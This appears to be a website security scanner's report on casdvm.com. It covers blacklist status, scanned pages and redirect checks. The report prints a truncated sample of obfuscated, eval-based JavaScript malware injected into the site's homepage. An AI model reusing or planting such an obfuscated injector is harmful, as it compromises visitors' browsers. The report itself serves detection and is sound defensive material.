Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=casdvm.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://casdvm.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.casdvm.com/ | 200 OK Content-Length: 3086 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d" "oc" "ument";ps="s" "plit";try{ (window[vz].body)}catch(q){aa=function(ff){ff="fromCh" ff;for(i=0;i<z.length;i ){za =String[ff](e(v (z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{ e(vz)["\x62od" z]}catch(q){a2="_";}z="16_16_76_73_2d_35_71_7c_70_82_7a_72_7b_81_3b_74_72_81_52_79_72_7a_72_7b_81_80_4f_86_61_6e_74_5b_6e_7a_72_35_34_6f_7c_71_86_34_36_68_3d_6a_36_88_1a_16_16_16_76_73_7f_6e_7a_72_7f_35_36_48_1a_16_16_8a_2d_72_79_80_72_2d_88_1a_16_16_16_71_7c_70_ Antivirus reports:
| ||
http://www.casdvm.com/<?php echo esc_url( __( 'http://wordpress.org/', 'living-journal' ) ); ?> | 404 Not Found Content-Length: 0 Content-Type: text/html | clean |
http://www.casdvm.com/test404page.js | 404 Not Found Content-Length: 0 Content-Type: text/html | clean |
http://www.casdvm.com/<?php echo esc_url( __( 'http://citizenjournal.net/living-journal-theme/', 'living-journal' ) ); ?> | 404 Not Found Content-Length: 0 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: casdvm.com
Result:
GET / HTTP/1.1
Host: casdvm.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: casdvm.com
Referer: http://www.google.com/search?q=casdvm.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: casdvm.com
Referer: http://www.google.com/search?q=casdvm.com
Result:
The result is similar to the first query. There are no suspicious redirects found.